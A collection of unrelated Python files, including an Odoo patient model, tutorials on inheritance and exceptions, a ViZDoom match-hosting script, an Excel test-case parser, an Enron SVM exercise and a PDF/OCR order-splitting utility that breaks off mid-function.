'Free text information not included in the automatic summary',
help='Write any important information on the patient\'s condition,'
' surgeries, allergies, ...')
patient_of_medical_center_id = fields.Many2one(
string='Medical center',
comodel_name='medical.center',
)
# medical_center_secondary_ids = fields.Many2many(
# string='Secondary medical center',
# comodel_name='medical.center',
# )
@api.constrains('is_pregnant', 'gender')
def _check_is_pregnant(self):
for record in self:
if record.is_pregnant and record.gender != 'female':
raise ValidationError(
'Invalid selection - Only a female may be pregnant.'
)
@api.model
def _create_vals(self, vals):
vals = super(ThoriumcorpPatient, self)._create_vals(vals)
if not vals.get('identification_code'):
Seq = self.env['ir.sequence']
vals['identification_code'] = Seq.sudo().next_by_code(
self._name,
)
# vals.update({
# 'customer': True,
# })
return vals
def patient_blood_info(self):
self.blood_type = 'A'
self.rh = '-'
self.hb = 'aa'
# def _get_default_image_path(self, vals):
# super(ThoriumcorpPatient, self)._get_default_image_path(vals)
# return get_module_resource(
# 'thoriumcorp', 'static/src/img', 'patient-avatar.png'
# )
def toggle_is_pregnant(self):
self.toggle('is_pregnant')
def toggle_safety_cap_yn(self):
self.toggle('safety_cap_yn')
def toggle_counseling_yn(self):
self.toggle('counseling_yn')
|
from os import listdir
from os.path import isfile, join
class FileNameFeeder:
@staticmethod
def getFiles(inputDir):
onlyfiles = [f for f in listdir(inputDir) if isfile(join(inputDir, f))]
return onlyfiles
@staticmethod
def getImageFiles(inputDir):
fileNameList = FileNameFeeder.getFiles(inputDir)
extensionList = ["png", "bmp", "jpg", "jpeg"]
fileNameList = [f for f in fileNameList if f[f.find(".") + 1:] in extensionList]
return fileNameList
'''
if __name__ == "__main__":
feeder = FileNameFeeder()
print feeder.getImageFiles(".")
'''
|
#상속 : 기존 클래스를 변경하지 않고 기능을 추가하거나 기존 기능을 변경하여 사용할때 사용
#개발기간을 단축하거나 코드의 중복을 피할 수 있다.
#SmartTv를 만들고 싶어 => 기존의 Tv클래스를 상속받아서 기능을 추가하면 SmartTv
class Tv: #부모클래스, 수퍼클래스
def powerOn(self):
print("TV를 켭니다.")
def powerOff(self):
print("TV를 끕니다.")
class SmartTv(Tv): #자식클래스, 서브클래스
def settopOn(self):
print("셋톱을 켭니다.")
def settopOff(self):
print("셋톱을 끕니다.")
def search(self, search):
print("%s를 검색합니다."%search)
#상속받은 부모의 모든 필드, 메소드를 사용할 수 있다.
#상속, 오버라이딩 => 클래스개념의 기초
stv = SmartTv() #자식객체 생성
stv.powerOn() #부모
stv.settopOn() #내꺼
stv.search("나혼자산다") #내꺼
stv.settopOff() #내꺼
stv.powerOff() #부모
|
import unittest
from katas.kyu_7.eighties_kids_5_you_cant_do_that_on_tv import bucket_of
class BucketTestCase(unittest.TestCase):
def test_equals(self):
self.assertEqual(bucket_of('wet water'), 'water')
def test_equals_2(self):
self.assertEqual(bucket_of('slime water'), 'sludge')
def test_equals_3(self):
self.assertEqual(bucket_of(
'I don\'t know if this will work'), 'slime')
def test_equals_4(self):
self.assertEqual(bucket_of(
'I don\'t know if this will work without watering it first.'),
'sludge')
def test_equals_5(self):
self.assertEqual(bucket_of(''), 'air')
def test_equals_6(self):
self.assertEqual(bucket_of('slimeslimeslimeslimewater'), 'sludge')
|
# -*- coding: utf-8 -*-
"""
Created on Mon Dec 3 17:38:40 2018
@author: srikant nayak
"""
from PIL import Image
import pywt
import numpy as np
import matplotlib.pyplot as plt
img1 = Image.open('s1.gif').convert('L')
img2 = Image.open('ss2.gif').convert('L')
img1_ary = np.array(img1)
img2_ary = np.array(img2)
import pywt
coeff1 = pywt.dwt2(img1_ary,wavelet='haar')
coeff2 = pywt.dwt2(img2_ary,wavelet='haar')
LL1, (LH1, HL1, HH1) = coeff1
LL2,(LH2,HL2,HH2 ) = coeff2
def fuse_coeff(coeff1, coeff2):
coeff = (coeff1 + coeff2) / 2
return coeff
fusedCooef = []
for i in range(len(coeff2)-1):
if(i == 0):
fusedCooef.append(fuse_coeff(LL1,LL2))
else:
c1 = fuse_coeff(coeff1[i][0], coeff2[i][0])
c2 = fuse_coeff(coeff1[i][1], coeff2[i][1])
c3 = fuse_coeff(coeff1[i][2], coeff2[i][2])
fusedCooef.append((c1,c2,c3))
fusedImage = pywt.waverec2(fusedCooef, wavelet='haar')
plt.imshow(fusedImage)#,cmap='gray') |
# num1=int(input('enter the number'))
# num2=int(input('enter the number 2'))
# div=None
# try:
# div=num1/num2
# print('try runs')
# except:
# print('exection ocuured')
# print('continue execution')
# if div!=None:
# print('result:',div)
import traceback,sys
#Types of error
#1. Compile time error
#2. Logical error(Deviation in output)-Corrected by debugging technique
#3. Runtime error(Serious error occurs during execution time).
'''print(BaseException.mro())#is an exception class for all runtime errors
print(Exception.mro())
print(ZeroDivisionError.mro())
print(IndexError.mro())
print(SyntaxError.mro())'''
def func():
print('fuction running')
#num1=int(input('Enter a number'))
#num2=int(input('Enter another number'))
div=None
a=[12,45,65]
try:
num1=int(input('Enter a number'))
num2=int(input('Enter another number'))
#print(a[5])
div=num1/num2
print('Try runs ')
#except:
#except(BaseException)as e:
#except(Exception)as e:
#except(ArithmeticError)as e:
except(ZeroDivisionError,ValueError)as e:
traceback.print_exc(file=sys.stdout)
print('Exception occured')
func()
else:
print('Result:',div)
finally:
print('finally executes')
'''except(ZeroDivisionError)as e:
traceback.print_exc(file=sys.stdout)
print('Exception occured')
except(ValueError)as e:
print(e)
traceback.print_exc(file=sys.stdout)
print('Exception occured')'''
print('Main continues')
'''if div:
print('Result:',div)'''
class AgeException(Exception):
def __init__(self, msg):
super().__init__(msg) # Exception class
class Employee:
def __init__(self, name, age):
if age < 18 :
raise AgeException('Age cannot be less than 18 years') # create own excetions using inheritance
else:
self.age = age
self.name = name
try:
ob = Employee('Sathish', 22)
# raise AgeException('Age cannot be less than 18 years')
# __main__.AgeException: Age cannot be less than 18 years
except(AgeException) as e:
print('Exception Age Handled')
print('Main Continues')
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter
import vizdoom as vzd
from tabulate import tabulate
from warnings import warn
MAX_MAP = 5
MAX_PLAYERS = 8
MAX_TIMELIMIT = 999
DEFAULT_TIMELIMIT = 10
DEFAULT_WAD_FILE = "cig2017.wad"
FRAMERATE = 35
if __name__ == "__main__":
parser = ArgumentParser("Host script for ViZDoom Copmetition at CIG 2017.",
formatter_class=ArgumentDefaultsHelpFormatter)
parser.add_argument('-b', '--bots', metavar="BOTS_NUM", dest='bots_num',
default=0, type=int,
help='number of bots to add [0,15]')
parser.add_argument('-p', '--players', metavar="PLAYERS_NUM", dest='players_num',
default=1, type=int,
help='number of players [1,16]')
parser.add_argument('-m', '--map', metavar="MAP", dest='map',
default=1, type=int,
help='map number [1,{}]'.format(MAX_MAP))
parser.add_argument('-t', '--time', metavar="TIMELIMIT", dest='timelimit',
default=DEFAULT_TIMELIMIT, type=float,
help='timelimit in minutes [1,{}]'.format(MAX_TIMELIMIT))
parser.add_argument('-r', '--record', metavar="RECORD_FILE", dest='recordfile',
default=None, type=str,
help='file where the match will be recorded')
parser.add_argument('-li', '--log-interval', metavar="LOG_INTERVAL", dest='log_interval',
default=None, type=float,
help='results logging inreval in minutes')
parser.add_argument('-dc', '--console', dest='disable_console', action='store_true',
default=False,
help='disables console output')
# parser.add_argument('-w', '--watch', dest='watch', action='store_const',
# default=False, const=True,
# help='roam the map as a ghost spectator')
parser.add_argument('-w', '--wad', dest='wad',
default=DEFAULT_WAD_FILE,
help='Wad file with maps.')
args = parser.parse_args()
players_num = args.players_num
bots_num = args.bots_num
map = "map0" + str(args.map)
console_enabled = not args.disable_console
timelimit = args.timelimit
watch = args.watch
record_file = args.recordfile
log_interval_min = args.log_interval
if args.log_interval is not None:
log_interval_tics = int(args.log_interval * 60 * FRAMERATE)
else:
log_interval_tics = None
if players_num < 0:
raise ValueError("Number of players should be >= 0. Got: {}".format(players_num))
if bots_num + players_num > MAX_PLAYERS:
raise ValueError("Maximum number of players and bots: {}. Got: {}".format(MAX_PLAYERS, bots_num + players_num))
players_num += 1
if timelimit < 0:
raise ValueError("Negative time limit given: {}".format(timelimit))
if timelimit > MAX_TIMELIMIT:
raise ValueError(
"Maximum timelimit of {} exceeded. "
"This must be an erorr: {}".format(MAX_TIMELIMIT, timelimit))
game = vzd.DoomGame()
game.set_doom_map(map)
game.set_doom_scenario_path(args.wad)
game.add_game_args("-deathmatch +viz_nocheat 1 +viz_debug 0 +viz_respawn_delay 10")
game.add_game_args("+sv_forcerespawn 1 +sv_noautoaim 1 +sv_respawnprotect 1 +sv_spawnfarthest 1 +sv_crouch 1")
game.add_game_args("+viz_spectator 1")
game.add_game_args("+name ghost")
game.add_game_args("-host {}".format(players_num))
game.add_game_args("+timelimit {}".format(timelimit))
game.add_game_args("-record {}".format(record_file))
game.set_console_enabled(console_enabled)
game.add_available_button(vzd.Button.TURN_LEFT)
game.add_available_button(vzd.Button.TURN_RIGHT)
game.add_available_button(vzd.Button.MOVE_RIGHT)
game.add_available_button(vzd.Button.MOVE_LEFT)
game.add_available_button(vzd.Button.MOVE_FORWARD)
game.add_available_button(vzd.Button.MOVE_BACKWARD)
game.add_available_button(vzd.Button.TURN_LEFT_RIGHT_DELTA)
game.add_available_button(vzd.Button.LOOK_UP_DOWN_DELTA)
game.add_available_button(vzd.Button.SPEED)
game.add_available_button(vzd.Button.MOVE_UP)
game.add_available_button(vzd.Button.MOVE_DOWN)
if watch:
raise ValueError()
# game.set_mode(vzd.Mode.SPECTATOR)
else:
game.set_mode(vzd.Mode.PLAYER)
game.set_window_visible(False)
game.set_screen_resolution(vzd.ScreenResolution.RES_1024X576)
plural = "s"
pn = "no"
if players_num > 1:
pn = players_num - 1
if players_num == 2:
plural = ""
if record_file is not None and bots_num > 0:
warn("Recording won't work properly with bots!")
print("Starting vizdoom CIG 2017 host for {} player{}.".format(pn, plural))
print("Configuration:")
print(tabulate([
("WAD", args.wad),
("TIMELIMIT (min)", timelimit),
("MAP", map),
("PLAYERS", players_num - 1),
("BOTS", bots_num),
("CONSOLE", console_enabled),
("RECORDFILE", record_file),
("LOG_INTERVAL (min)", log_interval_min)
], tablefmt="fancy_grid"
))
print()
game.init()
game.send_game_command("removebots")
for i in range(bots_num):
game.send_game_command("addbot")
player_count = int(game.get_game_variable(vzd.GameVariable.PLAYER_COUNT))
def gather_log():
l = []
for player_i in range(2, player_count + 1):
fragcount = game.get_game_variable(eval("vzd.GameVariable.PLAYER{}_FRAGCOUNT".format(player_i)))
l.append([player_i, fragcount])
return l
def print_log(log, t):
print("time: {:0.2f} minutes".format(t / 60 / FRAMERATE))
print(tabulate(log, ["Player", "Frags"], tablefmt="fancy_grid"))
print()
print("Host running.")
while not game.is_episode_finished():
game.advance_action()
t = game.get_episode_time()
if log_interval_tics is not None:
if t % log_interval_tics == 0:
log = gather_log()
print_log(log, t)
print(20 * "#")
print("Final results:")
t = game.get_episode_time()
log = gather_log()
print_log(log, t)
|
import codecs
import openpyxl
import sys, os
from time import gmtime, strftime
from pathlib import Path
from openpyxl.utils import get_column_letter, column_index_from_string
import array as arr
import numpy as np
new_old = 1
#excel = "C:/Users/daccl.hy/Desktop/1.xlsx"
excel = "D:/temp.xlsx"
source_name = ''
function_name = ''
duong_link = ''
function_csv = ''
wb_t = openpyxl.load_workbook(excel)
sheet_t = wb_t['Sheet1']
excel = sheet_t["A7"].value
excel = excel.replace("\\", '/')
####note
excel = 'C:/Users/luuco/Desktop/auto/New folder/vCIR_Cnt_Flag_Time/vCIR_Cnt_Flag_Time.xlsx'
function_name = 'Sensor_Processing_sfunc.c' + '/'
####note
wb = openpyxl.load_workbook(excel)
#-----------------write date of testing----
sheet = wb['テストケース表']
#sheet2 = wb['Sheet2']
#sheet3 = wb['Sheet3']
#--------------------------------------------------------
file = "C://Users//daccl.hy//Desktop//auto//func_additional_signal_cal_IO.html"
#sheet.max_row
# quet row 3 tim ID va Commnent
print('total column = ', sheet.max_column)
print('total row = ' ,sheet.max_row)
print('\n\n')
print('-------STARTING FIND TEST CASE-------')
print('\n\n')
x = 1
while x <= sheet.max_column:
if str(sheet.cell(3, x).value) == 'ID':
break
x += 1
ID = x
Comment = ID +1
# tim vi tri test case dau tien
x = 4
while x <= sheet.max_row:
if not str(sheet.cell(x, 2).value) == 'None':
break
x += 1
#print(x) vi tri bat dau cua testcase dau tien
# lay test case
all_table = ['']*(sheet.max_row + 1)
while x <= sheet.max_row:
if not str(sheet.cell(x, 1).value) == 'None':
all_table[x] = str(sheet.cell(x, 1).value).replace('-','') + '$$$' + str(sheet.cell(x, 2).value) + '$$$' + str(sheet.cell(x, ID).value) + '$$$' + str(sheet.cell(x, Comment).value) + '$$$'
x +=1
x =5
y = 0
while x <= sheet.max_row:
if not str(sheet.cell(x, 2).value) == 'None':
all_table[x - y -1] = all_table[x - y -1] + str(sheet.cell(x -1, 1).value).replace('-','')
y = 0
else:
y +=1
x +=1
#--------------xoa None----------------------
tring_t = ''
tring_g =''
result_t = ['']*(sheet.max_row + 1)
x = 4
y = 0
while x <= sheet.max_row:
tring_g = all_table[x].split('$$$')
#print(tring_g)
if len(all_table[x]) >4:
if not tring_g[1] == 'None':
result_t[y] = all_table[x]
y +=1
x +=1
#x =0
#while x <= sheet.max_row:
#print(result_t[x])
# x +=1
#result_t[y] = tring_g[0] + ',' + tring_g[3] + ',' + tring_g[1] + ',' + tring_g[2]
x = 0
i = 0
array_testcase = '' # all name test case
while x <= sheet.max_row:
tring_g = result_t[x].split('$$$')
#print(len(tring_g))
if len(tring_g) > 2:
result_t[x] = tring_g[0] + '$' + tring_g[4] + '$' + tring_g[1] + '$' + tring_g[2]+ '$'+ tring_g[3]
array_testcase = array_testcase + ',' + tring_g[1]
i +=1
x +=1
# all var test case
#x =0
line_of_test = i
#while x <= sheet.max_row:
#print(result_t[x])
# x +=1
#-------------------
max_row = sheet.max_row
line_of_test = sheet.max_row
max_column = sheet.max_column
test_Anal = ''
string_result = result_t.copy()
string_copy = result_t.copy()
string_result_1 = string_copy.copy()
p = 0
while p < (y + 1):
print(p, '\t' ,string_result_1[p].replace('$', '\t'))
p += 1
print('\n\n')
print('\n\n')
# delete None
p = 0
print('\n\n')
print('\n\n')
print('------------All test point following 14 point ---------')
print('\n')
if new_old == 0:
point_check = ['coverage_p1', 'div_zero_p2', 'overflow_p3', 'casting_p4', 'underflow_p5','array_p6', 'pointer_p7']
else:
point_check = ['input_variable_p1', 'input_func_return_p2', 'condition_p3', 'sw_case_p4', 'zero_division_p5','calc_overflow_p6', 'casting_overflow_p8', 'array_p9', 'pointer_p10', 'loop_p11' ]
for k in point_check:
print('-----------------------------', k, '-------------------------------')
p = 0
h = 1
string_t3 = ''
while p < i:
if k in string_result[p]:
string_result[p] = string_result[p]#.replace('-', '')
string_t3 = string_result[p].split("$")
#print(string_t3)
print( string_t3[2] + '\t' + string_t3[4] + '\t' + string_t3[0] + '~' + string_t3[1])
h += 1
p +=1
print('-------------------total =--------',h-1, '--------------------------' )
print('\n\n')
#exit()
#wb.save(excel)
sheet = wb['入出力データ分析表']
#-------------------------------------------------------------------------------------------------------
#print(sheet.max_column, sheet.max_row)
# find number of input
a = 4
while(a <= sheet.max_column):
if str(sheet.cell(3, a).value) == 'None':
a += 1
else:
break
number_colum_input = a
#print(number_colum_input)
# find Type of variable and colect
a = 1
while(a <= sheet.max_row):
if str(sheet.cell(a, 1).value) == 'Type':
cel_type = a
break
else:
a += 1
#print(cel_type)
type_var = ['']*(number_colum_input + 5)
a = 3
while a <= (number_colum_input - 1):
type_var[a] = str(sheet.cell(cel_type, a ).value)
#print(type_var[a])
a +=1
# dem so row cau variable va lay ten bien
a = 7
while(a <= sheet.max_row):
if str(sheet.cell(a, 1).value) == 'None':
a += 1
else:
break
number_row_var = a
#print(number_row_var)
var_name = ['']*(number_colum_input + 5)
a = 3
while a <= (number_colum_input - 1):
b = 6
while b <= (number_row_var -1):
var_name[a] = var_name[a] + str(sheet.cell(b, a ).value)
var_name[a] = var_name[a].replace('None','')
var_name[a] = var_name[a].replace('AMSTB_SrcFile.c/','')
var_name[a] = var_name[a].replace(function_name,'')
# xoa them source c.c 'Sensor_Processing_sfunc.c/'
b += 1
a +=1
def delete_t(a):
a = a.replace(' ','')
a = a.replace('\t','')
a = a.replace('\n','')
a = a.replace('\r','')
return a
# ghep type with name var
a = 3
while a <= (number_colum_input - 1):
type_var[a] = delete_t(type_var[a]) + ' '+ delete_t(var_name[a])
#print(type_var[a])
a +=1
# tim first Test Analysis
a = 1
while(a <= sheet.max_row):
if not str(sheet.cell(a, 2).value) == 'Test\xa0Analysis\xa0Item':
a += 1
else:
break
#---------------------------------------------------------------------------------------------------
first_colum = 3
last_colum = number_colum_input
first_row = a
last_row = sheet.max_row
#------------------------------------------------------------------------------------------------------
sheet = wb['入出力データ分析表']
#sheet.cell(row, column).value
x = first_colum
y = first_row
z = ['']*(last_colum + 1)
temp_t = ['']*(last_colum + 1)
while x <= last_colum:
while y <= last_row:
z[x] = z[x] + ',' + str(sheet.cell(y, x).value)
#print(temp_t[x])
y += 3
y = first_row
x += 1
array_t = ['']*(last_colum + 3)
a = 3
while a <= (last_colum):
temp_t[a] = list(dict.fromkeys(z[a].split(',')))
#temp_t[a] = temp_t[a].replace('None','')
#my_array[a] = np.asarray(temp_t[a])
#array_t[a].append(temp_t[a])
#print(temp_t[a])
a +=1
my_array = ['']*(last_colum + 3)
a = 3
while a <= (last_colum):
for i in temp_t[a]:
#my_array[a] = my_array[a].replace(',','')
my_array[a] = my_array[a] + ',' + i
a +=1
print('--------all test var input-----------')
print('\n')
# sort test case following max -> min
a_raw = array_testcase
c_raw = a_raw.split(',')
def sort_name(string):
b_raw = string
tempt = ''
if len(b_raw) > 0:
d = b_raw.split(',')
for i in c_raw:
if i in d:
tempt = tempt + ',' + i
return(tempt[1:])
#-----------------------------------------------------------------------------------------
a = 1
while a <= (last_colum):
#my_array[a] = my_array[a].replace(',','')
my_array[a] = my_array[a].replace(',,','')
my_array[a] = my_array[a].replace(',None','')
my_array[a] = my_array[a].replace('None','')
my_array[a]= my_array[a]#.replace('-','')
my_array[a]= my_array[a].replace('#','')
#my_array[a] = str(a) + '\t' + my_array[a]
my_array[a] = my_array[a].replace(' ','')
my_array[a] = my_array[a].replace('\t','')
my_array[a] = my_array[a].replace('\r','')
my_array[a] = my_array[a].replace('\n','')
a +=1
copy_tem_t = my_array.copy()
a = 1
while a <= (last_colum):
my_array[a] = sort_name(copy_tem_t[a])
my_array[a] = my_array[a].replace(',,','')
my_array[a] = my_array[a].replace('-','')
if a >= 3:
print(a-2, '\t',my_array[a])
a +=1
#---------------------------------------------------------
# colect name and test-case
p = 0
string_copy_name = ['']*(line_of_test + 1)
string_copy_testcase = ['']*(line_of_test + 1)
string_temp = ''
while p < (line_of_test + 1):
string_temp = string_result_1[p].split("$")
#print(string_temp)
if len(string_temp) >2:
g = string_temp[2];
# if not (g == 'A' and g == 'B' and g == 'C' and g == 'D' and g == 'E' and g == 'F' and g == 'G' and g == 'H' and g == 'I' and g == 'J'
# and g == 'K' and g == 'L' and g == 'M' and g == 'N' and g == 'O' and g == 'P' and g == 'Q' and g == 'R' and g == 'S' and g == 'T'
# and g == 'U' and g == 'V' and g == 'W' and g == 'X' and g == 'Y' and g == 'Z' ):
string_copy_name[p] = string_temp[2].replace('-','')
string_copy_name[p] = string_copy_name[p].replace('#','')
string_copy_testcase[p] =string_temp[0].replace('-','') + '~' + string_temp[1].replace('-','')
#string_copy_testcase[p] =string_temp[0] + '~' + string_temp[1]
string_copy_testcase[p] = string_copy_testcase[p].replace('#','')
p +=1
print('string_copy_name: ', string_copy_name)
print('string_copy_testcase: ', string_copy_testcase)
# danh lai testcase
my_array_t = ['']*last_colum
a = 1
while a <= (last_colum):
i= my_array[a]
b = 0
while b <= (line_of_test -1 ):
p = string_copy_name[b]
if (p in i):
if len(p) >=5:
my_array[a] = my_array[a].replace(p,string_copy_testcase[b])
b += 1
a +=1
a = 1
while a <= (last_colum):
i= my_array[a]
b = 0
while b <= (line_of_test -1 ):
p = string_copy_name[b]
if (p in i):
if len(p) >=4:
my_array[a] = my_array[a].replace(p,string_copy_testcase[b])
b += 1
a +=1
a = 1
while a <= (last_colum):
i= my_array[a]
b = 0
while b <= (line_of_test -1 ):
p = string_copy_name[b]
if (p in i):
if len(p) >=3:
my_array[a] = my_array[a].replace(p,string_copy_testcase[b])
b += 1
a +=1
a = 1
while a <= (last_colum):
i= my_array[a]
b = 0
while b <= (line_of_test -1 ):
p = string_copy_name[b]
if (p in i):
if len(p) >=2:
my_array[a] = my_array[a].replace(p,string_copy_testcase[b])
b += 1
a +=1
a = 1
while a <= (last_colum):
i= my_array[a]
b = 0
while b <= (line_of_test -1 ):
p = string_copy_name[b]
if (p in i):
if len(p) >=1:
my_array[a] = my_array[a].replace(p,string_copy_testcase[b])
b += 1
a +=1
#-----------merge test case-----------
#a = '1~5,59~63,64~65,66~70,71~75,76~78,79~83,84~86,87~88,89~90,91~91,92~94,95~96,97~101, 222~256, 257~267, 277~277, 299~300'
#b =a.split(',')
def merger_modify(a):
if len(a) == 0:
return('')
temp2 = ''
temp3 = ''
temp4 =''
b = a.split(',')
temp1 = 0
while temp1 < (len(b)-1):
temp2 = b[temp1].split('~')
temp3 = b[temp1+1].split('~')
if (int(temp3[0]) - int(temp2[1])) == 1:
b[temp1] = temp2[0] + '~0'
b[temp1+1] = '0~' + temp3[1]
temp1 += 1
result = ''
for i in b:
result = result + ',' + i
result = result.replace('0,0~','')
return(result)
#-------------------------------------
# merge test case as 155~155
def merge_testcase_special(string):
string = string.replace(' ','')
if len(string) == 0:
return('')
a_raw = string.split(',')
tempt = ''
tempt_t = ''
for i in a_raw:
tempt = i.split('~')
#print(tempt)
if tempt[0] == tempt[1]:
tempt_t = tempt_t + ',' +tempt[0]
else:
tempt_t = tempt_t + ',' +tempt[0] + '~' + tempt[1]
return(tempt_t[1:])
#--------------------------
tt = ''
array_result_t = my_array.copy
a = 1
while a <= (last_colum):
tt = my_array[a]
tt_t = merger_modify(tt)
tt_t = tt_t[1:]
my_array[a] = merge_testcase_special(tt_t)
#print(my_array[a])
a +=1
print('\n\n')
# ghep bien voi test case
a = 3
b = 3
while a <= (number_colum_input - 1):
type_var[a] = type_var[a] + '\t' + my_array[b]
#print(type_var[a])
a +=1
b +=1
print('\n\n')
print('--------total input var =', a-3, '----------')
print('\n\n')
#print poin 1-2 new templace
point_check = ['Number of elements', 'AMIN_return', 'AMOUT']
for k in point_check:
print('-----------------------------', k, '-------------------------------')
a = 3
b = 0
while a <= (number_colum_input - 1):
if k in type_var[a]:
print(type_var[a])
b +=1
a +=1
print('-------------------total =--------',b , '--------------------------' )
print('\n\n')
print('-----------------------------input variable-------------------------------')
a = 3
b = 0
while a <= (number_colum_input - 1):
if (not('Number of elements' in type_var[a]) and (not 'AMIN_return' in type_var[a])):
print(type_var[a])
b +=1
a +=1
print('-------------------total =--------',b , '--------------------------' )
print('\n\n')
#--------------------------
print('\n\n')
print('\n\n')
#p = 0
#while p < line_of_test:
# print(p, '\t',string_copy[p])
# p += 1
|
#!/usr/bin/python
"""
This is the code to accompany the Lesson 2 (SVM) mini-project.
Use a SVM to identify emails from the Enron corpus by their authors:
Sara has label 0
Chris has label 1
"""
import sys
from time import time
sys.path.append("../tools/")
from email_preprocess import preprocess
### features_train and features_test are the features for the training
### and testing datasets, respectively
### labels_train and labels_test are the corresponding item labels
features_train, features_test, labels_train, labels_test = preprocess()
# features_train = features_train[:len(features_train)/100]
# labels_train = labels_train[:len(labels_train)/100]
from sklearn import svm
from sklearn.metrics import accuracy_score
clf = svm.SVC(kernel = 'rbf',C = 10000)
t0 = time()
clf.fit(features_train, labels_train)
print "training time:", round(time()-t0, 3), "s"
t1 = time()
predict = clf.predict(features_test)
print "testing time:", round(time()-t0, 3), "s"
print accuracy_score(labels_test, predict)
print "10", predict[10]
print "26", predict[26]
print "50", predict[50]
count = 0
for i in predict:
if i == 1:
count = count + 1
print "Total", count
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('basketball', '0061_player_is_active'),
]
operations = [
migrations.AddField(
model_name='game',
name='score_type',
field=models.CharField(choices=[('1and2', "1's and 2's"), ('2and3', "2's and 3's")], max_length=30, null=True),
),
migrations.AlterField(
model_name='player',
name='is_active',
field=models.BooleanField(default=True, help_text='Determine if a player should be selectable when creating games'),
),
]
|
# -*- coding: utf-8 -*-
import wx
import ukbiobank
class M_AM_B(wx.Frame, ukbiobank.ukbio):
pass
class SelectVariablesFrame(wx.Frame, ukbiobank.ukbio):
__metaclass__ = M_AM_B
def __init__(self, parent, ukb):
super().__init__(parent=parent, title="UKBiobank-tools checkbox")
panel = wx.Panel(self)
my_sizer = wx.BoxSizer(wx.VERTICAL)
# Variables checkbox
self.checkbox = wx.CheckListBox(
panel, choices=ukbiobank.utils.utils.getFieldnames(ukb)
)
# Description
desc = wx.TextCtrl(
panel, value="Select desired variables", style=wx.TE_READONLY
)
# #Submit button
submit = wx.Button(panel, label="Submit")
submit.Bind(wx.EVT_BUTTON, lambda evt, ukb=ukb: self.submit(evt, parent, ukb))
my_sizer.Add(desc, 1, wx.CENTER | wx.EXPAND)
my_sizer.Add(self.checkbox, 1, wx.EXPAND)
my_sizer.Add(submit, 1, wx.EXPAND)
panel.SetSizer(my_sizer)
self.Show()
# set selections
def submit(self, event, parent, ukb):
selections = {}
selections["include_variables"] = list(self.checkbox.GetCheckedStrings())
# Setting selections, passing through parent MenuFrame
parent.selectionsSetter(arg1=selections)
self.Hide()
return
|
import PyPDF2
import pytesseract
import os
import sys
from pdf2image import convert_from_path
from PIL import Image
from datetime import datetime
from configparser import ConfigParser
import shutil
settings_file = os.path.abspath(os.path.dirname(sys.argv[0])) + "\\settings.ini"
def check_create_dir(order_number):
# Read setting.ini file
Config = ConfigParser()
Config.read(settings_file)
order_path = os.path.join(Config.get("PATH SETTINGS", "order_data"),order_number)
temp_draft = Config.get("PATH SETTINGS", "draft_temp")
draft_path = os.path.join(order_path, "DFT")
# Check if foler exist, if not create folder
if not os.path.exists(order_path):
os.makedirs(order_path)
os.makedirs(draft_path)
# Move draft files to new folder
for drawing in os.listdir(temp_draft):
old_path = os.path.join(temp_draft,drawing)
new_path = os.path.join(draft_path, drawing)
shutil.move(old_path, new_path)
def split_to_sam(order_number):
# Define file
file = order_number + ".pdf"
# Open combined WO pdf
pdfFile = open(file, 'rb')
pdfReader = PyPDF2.PdfFileReader(pdfFile)
# remove .pdf from filename
jobID = file.strip('.pdf')
# initialize sam counter
samID = 0
# Total number of pages
n_pages = pdfReader.numPages
# create list for order data and samPages
orderData = []
samPages = []
# Loop through document to find samPages
for i in range(n_pages):
# Create page obj
page = pdfReader.getPage(i)
# Extract text
pageText = page.extractText()
# Search JobID in text
if jobID in pageText:
samPages.append(i)
# loop trough file and save sam
for i in range(n_pages):
# Create writer and get page
pdfWriter = PyPDF2.PdfFileWriter()
# iterate trough document
if i in samPages:
# write PDF is sam in samPages
pdfWriter.addPage(pdfReader.getPage(i))
# Get part name
pageText = pdfReader.getPage(i).extractText()
newLines = []
n_letter = 0
# iterate through text
for line in pageText:
n_letter += 1
if line == "\n" and len(newLines) < 2:
newLines.append(n_letter)
# Cut string at new line to "omschrijving"
partName = pageText[newLines[0] : pageText.find("Omschrijving")]
# Cut string from article number to new line
artStr = pageText[pageText.find("Artikelnummer:") + 14 : newLines[1]]
# Extract number from string
artNr = ""
for char in artStr:
if char.isdigit():
artNr += char
# check next pages
for j in range(1,3):
if i + j not in samPages and i + j < n_pages:
pdfWriter.addPage(pdfReader.getPage(i + j))
else:
break
# Read setting.ini file
Config = ConfigParser()
Config.read(settings_file)
path = os.path.join(Config.get("PATH SETTINGS", "order_data"), jobID)
# Define save path
saveName = str(jobID) + ' SAM ' + str(samID) + '.pdf'
savePath = os.path.join(path, saveName)
# Save PDF
samPDF = open(savePath,'wb')
pdfWriter.write(samPDF)
samPDF.close()
# Create list of Filename,samID, partName, artNr and add to orderData
partData = [savePath, samID, partName, artNr]
orderData.append(partData)
samID += 1
#return orderData
def get_drawing_data(drawing):
#Script path
path = os.path.abspath(os.path.dirname(sys.argv[0]))
# get user name
user = os.getlogin()
#Tesseract executable
pytesseract.pytesseract.tesseract_cmd = 'C:/Users/'+ user +'/AppData/Local/Tesseract-OCR/tesseract.exe'
# Path to Poppler
poppler_path= os.path.join(path, '/poppler-0.68.0/bin')
# Open combined WO pdf
with open(drawing, 'rb') as pdfFile:
pdfReader = PyPDF2.PdfFileReader(pdfFile)
page = pdfReader.getPage(0)
# Convert to image, crop and save
images = convert_from_path(drawing, dpi=300, poppler_path=poppler_path)
for image in images:
left, upper, right, lower = image.getbbox()
if right < lower:
# Portrait
temp_img = image.crop(((right - 1020), (lower - 300), (right - 380), (lower - 220)))
else:
# Landscape
temp_img = image.crop(((right - 970), (lower - 240), (right - 350), (lower - 155)))
# Get artNr and remove whitespace
artNr = ''.join(pytesseract.image_to_string(temp_img).split())
# Return atricle number from drawing
return artNr
def combine_files(order_number):
# Create drawingData dictionairy
drawingData = {}
# FOR DEBUGGING ONLY
lastTime = datetime.now()
# Define dirs
# Read setting.ini file
Config = ConfigParser()
Config.read(settings_file)
dftDir = os.path.join(Config.get("PATH SETTINGS", "order_data"), order_number, "DFT")
count = 0
# Run get_drawing_data on files in dir
for drawing in os.listdir(dftDir):
drawingPath = os.path.join(dftDir, drawing)
artNr_dft = get_drawing_data(drawingPath)
drawingData.update({artNr_dft : drawingPath})
count += 1
# Create WO PDF's and get orderData
orderData = split_to_sam(order_number)
# Match percentage
match = 0.9
# loop through orderData
